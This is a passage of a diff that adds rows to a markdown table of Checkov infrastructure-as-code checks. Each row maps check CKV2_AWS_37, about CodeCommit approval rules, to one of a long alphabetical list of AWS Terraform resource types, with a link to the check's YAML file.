+|  797 | CKV2_AWS_37     | resource | aws_egress_only_internet_gateway                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  798 | CKV2_AWS_37     | resource | aws_eip                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  799 | CKV2_AWS_37     | resource | aws_eip_association                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  800 | CKV2_AWS_37     | resource | aws_eks_cluster                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  801 | CKV2_AWS_37     | resource | aws_eks_fargate_profile                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  802 | CKV2_AWS_37     | resource | aws_eks_node_group                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  803 | CKV2_AWS_37     | resource | aws_elastic_beanstalk_application                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  804 | CKV2_AWS_37     | resource | aws_elastic_beanstalk_application_version               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  805 | CKV2_AWS_37     | resource | aws_elastic_beanstalk_configuration_template            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  806 | CKV2_AWS_37     | resource | aws_elastic_beanstalk_environment                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  807 | CKV2_AWS_37     | resource | aws_elasticache_cluster                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  808 | CKV2_AWS_37     | resource | aws_elasticache_parameter_group                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  809 | CKV2_AWS_37     | resource | aws_elasticache_replication_group                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  810 | CKV2_AWS_37     | resource | aws_elasticache_security_group                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  811 | CKV2_AWS_37     | resource | aws_elasticache_subnet_group                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  812 | CKV2_AWS_37     | resource | aws_elasticsearch_domain                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  813 | CKV2_AWS_37     | resource | aws_elasticsearch_domain_policy                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  814 | CKV2_AWS_37     | resource | aws_elastictranscoder_pipeline                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  815 | CKV2_AWS_37     | resource | aws_elastictranscoder_preset                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  816 | CKV2_AWS_37     | resource | aws_elb                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  817 | CKV2_AWS_37     | resource | aws_elb_attachment                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  818 | CKV2_AWS_37     | resource | aws_emr_cluster                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  819 | CKV2_AWS_37     | resource | aws_emr_instance_group                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  820 | CKV2_AWS_37     | resource | aws_emr_security_configuration                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  821 | CKV2_AWS_37     | resource | aws_flow_log                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  822 | CKV2_AWS_37     | resource | aws_fms_admin_account                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  823 | CKV2_AWS_37     | resource | aws_fsx_lustre_file_system                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  824 | CKV2_AWS_37     | resource | aws_fsx_windows_file_system                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  825 | CKV2_AWS_37     | resource | aws_gamelift_alias                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  826 | CKV2_AWS_37     | resource | aws_gamelift_build                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  827 | CKV2_AWS_37     | resource | aws_gamelift_fleet                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  828 | CKV2_AWS_37     | resource | aws_gamelift_game_session_queue                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  829 | CKV2_AWS_37     | resource | aws_glacier_vault                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  830 | CKV2_AWS_37     | resource | aws_glacier_vault_lock                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  831 | CKV2_AWS_37     | resource | aws_globalaccelerator_accelerator                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  832 | CKV2_AWS_37     | resource | aws_globalaccelerator_endpoint_group                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  833 | CKV2_AWS_37     | resource | aws_globalaccelerator_listener                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  834 | CKV2_AWS_37     | resource | aws_glue_catalog_database                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  835 | CKV2_AWS_37     | resource | aws_glue_catalog_table                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  836 | CKV2_AWS_37     | resource | aws_glue_classifier                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  837 | CKV2_AWS_37     | resource | aws_glue_connection                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  838 | CKV2_AWS_37     | resource | aws_glue_crawler                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  839 | CKV2_AWS_37     | resource | aws_glue_job                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  840 | CKV2_AWS_37     | resource | aws_glue_security_configuration                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  841 | CKV2_AWS_37     | resource | aws_glue_trigger                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  842 | CKV2_AWS_37     | resource | aws_glue_workflow                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  843 | CKV2_AWS_37     | resource | aws_guardduty_detector                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  844 | CKV2_AWS_37     | resource | aws_guardduty_invite_accepter                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  845 | CKV2_AWS_37     | resource | aws_guardduty_ipset                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  846 | CKV2_AWS_37     | resource | aws_guardduty_member                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  847 | CKV2_AWS_37     | resource | aws_guardduty_organization_admin_account                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  848 | CKV2_AWS_37     | resource | aws_guardduty_organization_configuration                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  849 | CKV2_AWS_37     | resource | aws_guardduty_threatintelset                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  850 | CKV2_AWS_37     | resource | aws_iam_access_key                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  851 | CKV2_AWS_37     | resource | aws_iam_account_alias                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  852 | CKV2_AWS_37     | resource | aws_iam_account_password_policy                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  853 | CKV2_AWS_37     | resource | aws_iam_group                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  854 | CKV2_AWS_37     | resource | aws_iam_group_membership                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  855 | CKV2_AWS_37     | resource | aws_iam_group_policy                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  856 | CKV2_AWS_37     | resource | aws_iam_group_policy_attachment                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  857 | CKV2_AWS_37     | resource | aws_iam_instance_profile                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  858 | CKV2_AWS_37     | resource | aws_iam_openid_connect_provider                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  859 | CKV2_AWS_37     | resource | aws_iam_policy                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  860 | CKV2_AWS_37     | resource | aws_iam_policy_attachment                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  861 | CKV2_AWS_37     | resource | aws_iam_policy_document                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  862 | CKV2_AWS_37     | resource | aws_iam_role                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  863 | CKV2_AWS_37     | resource | aws_iam_role_policy                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  864 | CKV2_AWS_37     | resource | aws_iam_role_policy_attachment                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  865 | CKV2_AWS_37     | resource | aws_iam_saml_provider                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  866 | CKV2_AWS_37     | resource | aws_iam_server_certificate                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  867 | CKV2_AWS_37     | resource | aws_iam_service_linked_role                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  868 | CKV2_AWS_37     | resource | aws_iam_user                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  869 | CKV2_AWS_37     | resource | aws_iam_user_group_membership                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  870 | CKV2_AWS_37     | resource | aws_iam_user_login_profile                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  871 | CKV2_AWS_37     | resource | aws_iam_user_policy                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  872 | CKV2_AWS_37     | resource | aws_iam_user_policy_attachment                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  873 | CKV2_AWS_37     | resource | aws_iam_user_ssh_key                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  874 | CKV2_AWS_37     | resource | aws_inspector_assessment_target                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  875 | CKV2_AWS_37     | resource | aws_inspector_assessment_template                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  876 | CKV2_AWS_37     | resource | aws_inspector_resource_group                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  877 | CKV2_AWS_37     | resource | aws_instance                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  878 | CKV2_AWS_37     | resource | aws_internet_gateway                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  879 | CKV2_AWS_37     | resource | aws_iot_certificate                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  880 | CKV2_AWS_37     | resource | aws_iot_policy                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  881 | CKV2_AWS_37     | resource | aws_iot_policy_attachment                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  882 | CKV2_AWS_37     | resource | aws_iot_role_alias                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  883 | CKV2_AWS_37     | resource | aws_iot_thing                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  884 | CKV2_AWS_37     | resource | aws_iot_thing_principal_attachment                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  885 | CKV2_AWS_37     | resource | aws_iot_thing_type                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  886 | CKV2_AWS_37     | resource | aws_iot_topic_rule                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  887 | CKV2_AWS_37     | resource | aws_key_pair                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  888 | CKV2_AWS_37     | resource | aws_kinesis_analytics_application                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  889 | CKV2_AWS_37     | resource | aws_kinesis_firehose_delivery_stream                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  890 | CKV2_AWS_37     | resource | aws_kinesis_stream                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
